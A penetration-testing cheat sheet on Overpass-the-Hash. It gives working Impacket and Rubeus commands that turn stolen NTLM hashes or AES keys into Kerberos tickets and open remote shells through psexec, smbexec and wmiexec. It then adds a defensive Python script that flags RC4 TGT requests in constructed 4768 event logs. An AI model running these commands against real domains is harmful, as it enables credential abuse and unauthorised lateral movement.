Overpass The Hash/Pass The Key (PTK)
By using Impacket examples:

```bash
# Request the TGT with hash
python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
# Request the TGT with aesKey (stronger encryption, and probably stealthier since AES is what Microsoft uses by default)
python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
# Request the TGT with password
python getTGT.py <domain_name>/<user_name>:[password]
# Set the TGT for impacket use
export KRB5CCNAME=<TGT_ccache_file>
# Execute remote commands with any of the following by using the TGT
python psexec.py rastalabs.local/[email protected] -k -no-pass
python smbexec.py rastalabs.local/[email protected] -k -no-pass
python wmiexec.py rastalabs.local/[email protected] -k -no-pass
```

Using Rubeus:

```powershell
# Ask and inject the ticket
.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt
# Execute a cmd in the remote machine
.\PsExec.exe -accepteula \\<remote_hostname> cmd
```
Impacket's psexec.py offers PsExec-like functionality. This will give you an interactive shell on the Windows host. psexec.py also allows using Service Tickets, saved as a ccache file, for authentication; these can be obtained via Impacket's GetST.py. It is much easier to use variables:
```bash
target=10.10.10.1
domain=test.local
username=john
export KRB5CCNAME=/full/path/to/john.ccache
python3 psexec.py $domain/$username@$target -k -no-pass
```
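From the defender's side, the point made above about AES being the Windows default is also the detection opportunity: a TGT requested with an NT hash (the `-hashes` / `/rc4` variants shown on this page) is logged on the domain controller as a Kerberos authentication event (4768) whose ticket encryption type is RC4-HMAC (0x17), whereas normal clients on an AES-capable domain request AES (0x12/0x11). The following Python script is an added example, not part of the original page or of Impacket/Rubeus: it scans constructed 4768 records (JSON lines using the field names from the Windows event XML) and reports accounts that obtained a TGT with a weak encryption type, excluding an assumed allow-list of accounts that still legitimately need RC4.

```python
"""Flag Kerberos TGT requests (Windows Security event 4768) that were issued
with an RC4/DES ticket encryption type. On a domain where AES is the default,
an RC4 AS-REQ is what an NT-hash-based Overpass-the-Hash request looks like.
A request made with the AES key instead (getTGT.py -aesKey) is logged as
0x12/0x11 and is NOT caught by this rule; that case needs other signals such
as an unusual source host for the account.
The log lines, field names and allow-list below are constructed for this example."""
import json
from collections import defaultdict

# Kerberos encryption types as they appear in the 4768 TicketEncryptionType field
ETYPE_NAMES = {
    0x1: "DES-CBC-CRC", 0x3: "DES-CBC-MD5",
    0x11: "AES128-CTS-HMAC-SHA1-96", 0x12: "AES256-CTS-HMAC-SHA1-96",
    0x17: "RC4-HMAC", 0x18: "RC4-HMAC-EXP",
}
WEAK_ETYPES = {0x1, 0x3, 0x17, 0x18}

# Accounts known to still need RC4 (legacy service accounts); constructed allow-list, tune per domain
RC4_ALLOWED = {"svc_legacy"}

# Constructed 4768/4769 events, one JSON object per line
SAMPLE_LOG = """\
{"EventID":4768,"TargetUserName":"alice","TargetDomainName":"TEST.LOCAL","IpAddress":"10.10.10.50","TicketEncryptionType":"0x12","Status":"0x0"}
{"EventID":4768,"TargetUserName":"john","TargetDomainName":"TEST.LOCAL","IpAddress":"10.10.10.77","TicketEncryptionType":"0x17","Status":"0x0"}
{"EventID":4768,"TargetUserName":"svc_legacy","TargetDomainName":"TEST.LOCAL","IpAddress":"10.10.10.20","TicketEncryptionType":"0x17","Status":"0x0"}
{"EventID":4769,"TargetUserName":"john","TargetDomainName":"TEST.LOCAL","IpAddress":"10.10.10.77","TicketEncryptionType":"0x12","Status":"0x0"}
{"EventID":4768,"TargetUserName":"john","TargetDomainName":"TEST.LOCAL","IpAddress":"10.10.10.77","TicketEncryptionType":"0xffffffff","Status":"0x18"}
"""


def parse_events(text):
    """Parse JSON lines, skipping blank or malformed records, and add an integer 'etype' field."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
            ev["etype"] = int(ev["TicketEncryptionType"], 16)
        except (ValueError, KeyError):
            continue  # malformed record: skip it rather than abort the whole scan
        events.append(ev)
    return events


def find_rc4_tgt_requests(events, allowed=RC4_ALLOWED):
    """Return {account: [(source_ip, etype_name), ...]} for successful 4768 events
    whose ticket encryption type is RC4 or DES, ignoring allow-listed accounts.
    Grouping by account collapses repeated requests from one host into one finding."""
    by_account = defaultdict(set)
    for ev in events:
        # Only successful TGT issuance; failed requests carry no meaningful etype (0xffffffff)
        if ev.get("EventID") != 4768 or ev.get("Status") != "0x0":
            continue
        if ev["etype"] not in WEAK_ETYPES or ev["TargetUserName"] in allowed:
            continue
        name = ETYPE_NAMES.get(ev["etype"], hex(ev["etype"]))
        by_account[ev["TargetUserName"]].add((ev["IpAddress"], name))
    return {user: sorted(hits) for user, hits in by_account.items()}


if __name__ == "__main__":
    for user, hits in find_rc4_tgt_requests(parse_events(SAMPLE_LOG)).items():
        for ip, etype in hits:
            print(f"ALERT 4768 weak etype: user={user} src={ip} etype={etype}")
```

In the constructed sample only `john` is reported: `alice` used AES, `svc_legacy` is allow-listed, the 4769 record is a service-ticket event rather than a TGT request, and the last line is a failed pre-authentication. Expect noise from accounts that have no AES keys (password never changed since AES was enabled) or from legacy systems; the allow-list is where that tuning goes, and shrinking it over time by migrating those accounts is the mitigation that removes the RC4 option in the first place.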